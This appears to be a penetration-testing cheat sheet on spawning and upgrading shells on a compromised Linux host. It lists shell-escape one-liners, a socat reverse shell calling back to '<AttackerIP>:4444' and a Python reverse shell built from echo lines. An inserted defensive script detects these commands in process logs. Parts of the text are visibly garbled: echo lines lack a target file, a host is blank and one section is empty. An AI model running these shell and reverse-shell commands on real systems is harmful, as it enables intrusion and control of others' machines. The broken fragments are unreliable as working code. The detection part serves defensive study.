Spawning shells

Non-interactive tty-shell

If you have a non-tty shell, there are certain commands you can't run. This can happen if you upload a reverse shell to a web server, so that the shell you get runs as the user www-data or similar. These users are not meant to have shells, as they don't interact with the system as humans do.

So without a tty shell you can't run su or sudo, for example. This can be annoying if you manage to get a root password but can't use it.

Anyways, if you get one of these shells you can upgrade it to a tty-shell using the following methods:

Using python

python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'


echo "os.system('/bin/bash')"


/bin/sh -i


/bin/bash -i


perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";


ruby: exec "/bin/sh"


awk 'BEGIN {system("/bin/sh")}'


find / -name blahblah -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

More, less, or man

Run more, less, or man on a file, then try one of the following:

'! /bin/sh'


lua: os.execute('/bin/sh')

From within IRB

exec "/bin/sh"

From within VI



:set shell=/bin/bash
:shell

or execute

vi ;/bin/bash

Once you exit vi (:q!) you get a shell. This is helpful in scenarios where the user is asked to input which file to open.

From within nmap


Interactive tty-shell

Method #1

Python pty module

python -c 'import pty; pty.spawn("/bin/bash")'

Method #2

Using socat

So if you manage to upgrade to a non-interactive tty-shell you will still have a limited shell. You won't be able to use the up and down arrows, and you won't have tab-completion. This can be really frustrating if you stay in that shell for long. It is also riskier: if an execution gets stuck, you can't use Ctrl-C or Ctrl-Z without killing your session. However, that can be fixed using socat. Follow these instructions.

On Kali (listen):

socat file:`tty`,raw,echo=0 tcp-listen:4444  

On Victim (launch):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<AttackerIP>:4444

Method #3

Using stty

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
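
Seen from the defender's side, the upgrade commands above leave a recognisable trace when a service account such as www-data runs them. The following is an added example, not part of the original page: a check that matches those command lines in process-execution events. The log format, the service-account list, the signature names and the sample events are all assumptions constructed for the example.

```python
import re

# Assumption: accounts that should never own an interactive shell on this host.
SERVICE_USERS = {"www-data", "apache", "nginx", "nobody"}

# One signature per upgrade technique listed on this page (first match wins).
SIGNATURES = {
    "python-pty": re.compile(r"\bpython[\d.]*\s+-c\s.*\bpty\.spawn\("),
    "socat-pty": re.compile(r"\bsocat\s.*\bexec:.*\bpty\b"),
    "perl-exec": re.compile(r"\bperl\s+-e\s.*\bexec\s+\"/bin/(?:ba)?sh"),
    "awk-system": re.compile(r"\bawk\s.*\bsystem\(\"/bin/(?:ba)?sh"),
    "shell-dash-i": re.compile(r"(?:^|[\s/'])(?:ba)?sh\s+-l?i\b"),
}

# Constructed log format: "<time> user=<u> parent=<p> cmd=<command line>"
LINE = re.compile(r"^(\S+) user=(\S+) parent=(\S+) cmd=(.*)$")

# Constructed sample events; 192.0.2.10 is a documentation-only address.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z user=www-data parent=apache2 cmd=python -c 'import pty; pty.spawn("/bin/sh")'
2024-01-01T10:00:09Z user=www-data parent=sh cmd=socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.0.2.10:4444
2024-01-01T10:01:00Z user=alice parent=sshd cmd=/bin/bash -i
2024-01-01T10:02:00Z user=www-data parent=apache2 cmd=awk 'BEGIN {system("/bin/sh")}'
2024-01-01T10:03:00Z user=www-data parent=apache2 cmd=php-fpm: pool www
2024-01-01T10:04:00Z user=nobody parent=cron cmd=python3 /opt/app/report.py
"""

def detect(log_text, service_users=SERVICE_USERS):
    """Return (time, user, parent, technique) for each suspicious exec event."""
    hits = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # not in the expected format
        when, user, parent, cmd = m.groups()
        if user not in service_users:
            continue  # interactive users legitimately start shells
        for name, sig in SIGNATURES.items():
            if sig.search(cmd):
                hits.append((when, user, parent, name))
                break  # one alert per event
    return hits

if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print("ALERT", *hit)
```

In practice the events would come from a process-execution audit source, and the parent process (for example a web server) is the strongest signal to alert on.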

Misc: Simple Reverse Shell

echo "import socket" >
echo "import subprocess" >>
echo "import os" >>
echo "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)" >>
echo 's.connect(("",443))' >>
echo "os.dup2(s.fileno(),0)" >>
echo "os.dup2(s.fileno(),1)" >>
echo "os.dup2(s.fileno(),2)" >>
echo '["/bin/sh","-i"])' >>

